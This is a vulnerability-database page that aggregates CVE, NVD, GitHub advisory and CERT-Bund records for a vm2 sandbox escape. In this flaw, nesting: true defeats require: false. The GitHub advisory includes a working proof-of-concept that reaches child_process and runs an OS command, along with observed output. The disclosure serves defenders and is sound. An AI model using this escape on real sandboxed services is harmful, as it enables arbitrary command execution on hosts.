Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-44007 (GCVE-0-2026-44007)
Vulnerability from cvelistv5 – Published: 2026-05-13 17:33 – Updated: 2026-05-15 09:58
VLAI
EPSS
Title
vm2: nesting: true bypasses require: false, allowing sandbox escape to arbitrary OS command execution
Summary
vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.1, when a NodeVM is created with nesting: true, sandbox code can unconditionally require('vm2') regardless of the outer VM's require configuration — including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised. This vulnerability is fixed in 3.11.1.
Severity
9.1 (Critical)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-284 - Improper Access Control
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/patriksimek/vm2/security/advis… | x_refsource_CONFIRM |
| http://www.openwall.com/lists/oss-security/2026/0… |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| patriksimek | vm2 |
Affected:
< 3.11.1
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2026-05-13T17:45:33.625Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2026/05/05/11"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-44007",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-15T03:55:57.981614Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-15T09:58:32.221Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "vm2",
"vendor": "patriksimek",
"versions": [
{
"status": "affected",
"version": "\u003c 3.11.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.1, when a NodeVM is created with nesting: true, sandbox code can unconditionally require(\u0027vm2\u0027) regardless of the outer VM\u0027s require configuration \u2014 including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised. This vulnerability is fixed in 3.11.1."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-284",
"description": "CWE-284: Improper Access Control",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-13T17:33:19.799Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx"
}
],
"source": {
"advisory": "GHSA-8hg8-63c5-gwmx",
"discovery": "UNKNOWN"
},
"title": "vm2: nesting: true bypasses require: false, allowing sandbox escape to arbitrary OS command execution"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-44007",
"datePublished": "2026-05-13T17:33:19.799Z",
"dateReserved": "2026-05-04T21:24:36.505Z",
"dateUpdated": "2026-05-15T09:58:32.221Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-44007",
"date": "2026-06-20",
"epss": "0.00776",
"percentile": "0.50961"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-44007\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-13T18:16:17.527\",\"lastModified\":\"2026-05-14T15:18:26.150\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.1, when a NodeVM is created with nesting: true, sandbox code can unconditionally require(\u0027vm2\u0027) regardless of the outer VM\u0027s require configuration \u2014 including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised. This vulnerability is fixed in 3.11.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-284\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"3.11.1\",\"matchCriteriaId\":\"7836EA26-7490-43B0-ACA0-31B580080D72\"}]}]}],\"references\":[{\"url\":\"https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2026/05/05/11\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"http://www.openwall.com/lists/oss-security/2026/05/05/11\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2026-05-13T17:45:33.625Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44007\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-15T03:55:57.981614Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-15T09:58:28.453Z\"}}], \"cna\": {\"title\": \"vm2: nesting: true bypasses require: false, allowing sandbox escape to arbitrary OS command execution\", \"source\": {\"advisory\": \"GHSA-8hg8-63c5-gwmx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 9.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"patriksimek\", \"product\": \"vm2\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.11.1\"}]}], \"references\": [{\"url\": \"https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx\", \"name\": \"https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.1, when a NodeVM is created with nesting: true, sandbox code can unconditionally require(\u0027vm2\u0027) regardless of the outer VM\u0027s require configuration \\u2014 including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised. This vulnerability is fixed in 3.11.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-13T17:33:19.799Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-44007\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-15T09:58:32.221Z\", \"dateReserved\": \"2026-05-04T21:24:36.505Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-13T17:33:19.799Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-44007
Vulnerability from fkie_nvd - Published: 2026-05-13 18:16 - Updated: 2026-06-17 10:50
Severity
Summary
vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.1, when a NodeVM is created with nesting: true, sandbox code can unconditionally require('vm2') regardless of the outer VM's require configuration — including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised. This vulnerability is fixed in 3.11.1.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx | Exploit, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2026/05/05/11 | Mailing List, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| vm2_project | vm2 | * |
{
"affected": [
{
"affectedData": [
{
"product": "vm2",
"vendor": "patriksimek",
"versions": [
{
"status": "affected",
"version": "\u003c 3.11.1"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "7836EA26-7490-43B0-ACA0-31B580080D72",
"versionEndExcluding": "3.11.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.1, when a NodeVM is created with nesting: true, sandbox code can unconditionally require(\u0027vm2\u0027) regardless of the outer VM\u0027s require configuration \u2014 including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised. This vulnerability is fixed in 3.11.1."
}
],
"id": "CVE-2026-44007",
"lastModified": "2026-06-17T10:50:12.107",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-44007",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-15T03:55:57.981614Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-05-13T18:16:17.527",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2026/05/05/11"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-284"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-8HG8-63C5-GWMX
Vulnerability from github – Published: 2026-05-07 05:13 – Updated: 2026-05-14 20:37
VLAI
Summary
vm2 NodeVM `nesting: true` bypasses `require: false` allowing sandbox escape and arbitrary OS command execution
Details
Summary
When a NodeVM is created with nesting: true, sandbox code can unconditionally require('vm2') regardless of the outer VM's require configuration — including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised.
Details
The vulnerability is in how the nesting: true option interacts with the legacy module resolver.
lib/nodevm.js:96-99 — NESTING_OVERRIDE is a special builtin map that injects the vm2 package into the sandbox:
const NESTING_OVERRIDE = Object.freeze({
__proto__: null,
vm2: vm2NestingLoader
});
lib/nodevm.js:268-269 — When nesting: true, this override is passed into the resolver factory alongside the host's require options:
const customResolver = requireOpts instanceof Resolver;
const resolver = customResolver ? requireOpts : makeResolverFromLegacyOptions(
requireOpts,
nesting && NESTING_OVERRIDE, // ← injected when nesting:true
this._compiler
);
lib/resolver-compat.js:193-197 — This is the vulnerable branch. When require: false is set, requireOpts is falsy, so !options is true. Without nesting the function returns DENY_RESOLVER (block everything). With nesting, it instead builds a resolver that includes vm2 from NESTING_OVERRIDE:
function makeResolverFromLegacyOptions(options, override, compiler) {
if (!options) {
if (!override) return DENY_RESOLVER; // require:false, no nesting → deny all
// BUG: require:false + nesting:true reaches here
// override (NESTING_OVERRIDE) is applied, making vm2 available
const builtins = makeBuiltinsFromLegacyOptions(undefined, defaultRequire, undefined, override);
return new Resolver(DEFAULT_FS, [], builtins); // vm2 is now requireable
}
// ...
}
lib/builtin.js:102-106 — NESTING_OVERRIDE is merged unconditionally into builtins, overriding any user-configured allowlist:
if (overrides) {
const keys = Object.getOwnPropertyNames(overrides);
for (const key of keys) {
res.set(key, overrides[key]); // vm2 always injected when nesting:true
}
}
The result: require('vm2') always succeeds inside a NodeVM with nesting: true, regardless of require: false, require: { builtin: [] }, or any other restriction. Once the sandbox has vm2, it creates a new inner NodeVM with whatever require config it chooses — unconstrained by the outer VM — and reaches child_process.
This was introduced in commit 2353ce60 (Feb 8, 2022) and survived a major refactor in commit 9e2b6051 (Apr 8, 2023). The JSDoc for nesting does warn that "scripts can create a NodeVM which can require any host module," but does not document that nesting: true silently defeats require: false, which is the non-obvious part of this interaction.
PoC
Requirements: vm2 installed, Node.js v22.22.1 (also reproduced on earlier versions).
const { NodeVM } = require('vm2');
// Host intends: nesting enabled, but require completely disabled
const vm = new NodeVM({ nesting: true, require: false });
const result = vm.run(`
// Step 1: require('vm2') succeeds despite require:false on the outer VM
const { NodeVM: NVM } = require('vm2');
// Step 2: create an inner NodeVM with attacker-chosen require config
// This inner VM has no relation to the outer VM's restrictions
const inner = new NVM({ require: { builtin: ['child_process'] } });
// Step 3: execute arbitrary OS command in the inner VM
module.exports = inner.run(
'module.exports = require("child_process").execSync("id").toString()'
);
`);
console.log(result);
// uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),...
Observed output (confirmed on Node v22.22.1, vm2 commit 8dd0591):
uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),104(kvm),118(lpadmin),989(docker),990(ollama),991(nordvpn)
The variant with require: false also works — the outer VM's require setting has no effect:
new NodeVM({ nesting: true, require: false }).run(`
const { NodeVM: NVM } = require('vm2');
module.exports = new NVM({ require: { builtin: ['child_process'] } })
.run('module.exports = require("child_process").execSync("id").toString()');
`);
// uid=1000(akshat) ...
Narrow builtin allowlists are also bypassed. require: { builtin: ['path'] } still allows require('vm2') when nesting is enabled.
Impact
Who is affected: Any application that runs untrusted or user-supplied code inside a NodeVM with nesting: true. This includes multi-tenant code execution platforms, notebook/REPL services, plugin systems, and CI sandboxing tools that use vm2.
What an attacker can do: Execute arbitrary OS commands as the host process user. From there: read/write files, exfiltrate secrets from the environment, move laterally on the host network, or establish persistence.
Severity: The mental model mismatch is the core danger. A developer who sets require: false to lock down modules, then adds nesting: true to allow child VM creation, will believe the sandbox is restricted. It is not — require: false is silently overridden and the sandbox has unrestricted OS access.
Note: nesting: true must be set by the host. This is not a zero-cooperation escape from a default NodeVM. However, it is not pure misconfiguration either: the implementation defeats a strong and reasonable expectation (require: false should mean deny all), and the existing warning in the docs does not surface the require: false bypass specifically.
Severity
9.1 (Critical)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.11.0"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.11.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44007"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-693"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T05:13:21Z",
"nvd_published_at": "2026-05-13T18:16:17Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nWhen a `NodeVM` is created with `nesting: true`, sandbox code can unconditionally `require(\u0027vm2\u0027)` regardless of the outer VM\u0027s `require` configuration \u2014 including `require: false`. With access to `vm2`, the sandbox constructs a new inner `NodeVM` with its own unrestricted `require` settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a `NodeVM` with `nesting: true` is fully compromised.\n\n### Details\n\nThe vulnerability is in how the `nesting: true` option interacts with the legacy module resolver.\n\n**`lib/nodevm.js:96-99`** \u2014 `NESTING_OVERRIDE` is a special builtin map that injects the `vm2` package into the sandbox:\n\n```js\nconst NESTING_OVERRIDE = Object.freeze({\n __proto__: null,\n vm2: vm2NestingLoader\n});\n```\n\n**`lib/nodevm.js:268-269`** \u2014 When `nesting: true`, this override is passed into the resolver factory alongside the host\u0027s `require` options:\n\n```js\nconst customResolver = requireOpts instanceof Resolver;\nconst resolver = customResolver ? requireOpts : makeResolverFromLegacyOptions(\n requireOpts,\n nesting \u0026\u0026 NESTING_OVERRIDE, // \u2190 injected when nesting:true\n this._compiler\n);\n```\n\n**`lib/resolver-compat.js:193-197`** \u2014 This is the vulnerable branch. When `require: false` is set, `requireOpts` is falsy, so `!options` is true. Without nesting the function returns `DENY_RESOLVER` (block everything). With nesting, it instead builds a resolver that includes `vm2` from `NESTING_OVERRIDE`:\n\n```js\nfunction makeResolverFromLegacyOptions(options, override, compiler) {\n if (!options) {\n if (!override) return DENY_RESOLVER; // require:false, no nesting \u2192 deny all\n // BUG: require:false + nesting:true reaches here\n // override (NESTING_OVERRIDE) is applied, making vm2 available\n const builtins = makeBuiltinsFromLegacyOptions(undefined, defaultRequire, undefined, override);\n return new Resolver(DEFAULT_FS, [], builtins); // vm2 is now requireable\n }\n // ...\n}\n```\n\n**`lib/builtin.js:102-106`** \u2014 `NESTING_OVERRIDE` is merged unconditionally into builtins, overriding any user-configured allowlist:\n\n```js\nif (overrides) {\n const keys = Object.getOwnPropertyNames(overrides);\n for (const key of keys) {\n res.set(key, overrides[key]); // vm2 always injected when nesting:true\n }\n}\n```\n\nThe result: `require(\u0027vm2\u0027)` always succeeds inside a `NodeVM` with `nesting: true`, regardless of `require: false`, `require: { builtin: [] }`, or any other restriction. Once the sandbox has `vm2`, it creates a new inner `NodeVM` with whatever `require` config it chooses \u2014 unconstrained by the outer VM \u2014 and reaches `child_process`.\n\nThis was introduced in commit `2353ce60` (Feb 8, 2022) and survived a major refactor in commit `9e2b6051` (Apr 8, 2023). The JSDoc for `nesting` does warn that \"scripts can create a NodeVM which can require any host module,\" but does not document that `nesting: true` silently defeats `require: false`, which is the non-obvious part of this interaction.\n\n### PoC\n\n**Requirements:** vm2 installed, Node.js v22.22.1 (also reproduced on earlier versions).\n\n```js\nconst { NodeVM } = require(\u0027vm2\u0027);\n\n// Host intends: nesting enabled, but require completely disabled\nconst vm = new NodeVM({ nesting: true, require: false });\n\nconst result = vm.run(`\n // Step 1: require(\u0027vm2\u0027) succeeds despite require:false on the outer VM\n const { NodeVM: NVM } = require(\u0027vm2\u0027);\n\n // Step 2: create an inner NodeVM with attacker-chosen require config\n // This inner VM has no relation to the outer VM\u0027s restrictions\n const inner = new NVM({ require: { builtin: [\u0027child_process\u0027] } });\n\n // Step 3: execute arbitrary OS command in the inner VM\n module.exports = inner.run(\n \u0027module.exports = require(\"child_process\").execSync(\"id\").toString()\u0027\n );\n`);\n\nconsole.log(result);\n// uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),...\n```\n\n**Observed output (confirmed on Node v22.22.1, vm2 commit `8dd0591`):**\n```\nuid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),104(kvm),118(lpadmin),989(docker),990(ollama),991(nordvpn)\n```\n\nThe variant with `require: false` also works \u2014 the outer VM\u0027s require setting has no effect:\n\n```js\nnew NodeVM({ nesting: true, require: false }).run(`\n const { NodeVM: NVM } = require(\u0027vm2\u0027);\n module.exports = new NVM({ require: { builtin: [\u0027child_process\u0027] } })\n .run(\u0027module.exports = require(\"child_process\").execSync(\"id\").toString()\u0027);\n`);\n// uid=1000(akshat) ...\n```\n\nNarrow builtin allowlists are also bypassed. `require: { builtin: [\u0027path\u0027] }` still allows `require(\u0027vm2\u0027)` when nesting is enabled.\n\n### Impact\n\n**Who is affected:** Any application that runs untrusted or user-supplied code inside a `NodeVM` with `nesting: true`. This includes multi-tenant code execution platforms, notebook/REPL services, plugin systems, and CI sandboxing tools that use vm2.\n\n**What an attacker can do:** Execute arbitrary OS commands as the host process user. From there: read/write files, exfiltrate secrets from the environment, move laterally on the host network, or establish persistence.\n\n**Severity:** The mental model mismatch is the core danger. A developer who sets `require: false` to lock down modules, then adds `nesting: true` to allow child VM creation, will believe the sandbox is restricted. It is not \u2014 `require: false` is silently overridden and the sandbox has unrestricted OS access.\n\n**Note:** `nesting: true` must be set by the host. This is not a zero-cooperation escape from a default `NodeVM`. However, it is not pure misconfiguration either: the implementation defeats a strong and reasonable expectation (`require: false` should mean deny all), and the existing warning in the docs does not surface the `require: false` bypass specifically.",
"id": "GHSA-8hg8-63c5-gwmx",
"modified": "2026-05-14T20:37:04Z",
"published": "2026-05-07T05:13:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44007"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/05/05/11"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2 NodeVM `nesting: true` bypasses `require: false` allowing sandbox escape and arbitrary OS command execution"
}
WID-SEC-W-2026-1349
Vulnerability from csaf_certbund - Published: 2026-05-03 22:00 - Updated: 2026-06-16 22:00Summary
vm2: Mehrere Schwachstellen
Severity
Kritisch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: vm2 ist eine Sandbox, in der nicht vertrauenswürdiger Code der in Node integrierten Module ausgeführt werden kann.
Angriff: Ein Angreifer kann mehrere Schwachstellen in vm2 ausnutzen, um beliebigen Programmcode auszuführen, um einen Denial of Service Angriff durchzuführen, um Informationen offenzulegen, und um Sicherheitsvorkehrungen zu umgehen.
Betroffene Betriebssysteme: - Linux
- Sonstiges
- UNIX
- Windows
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
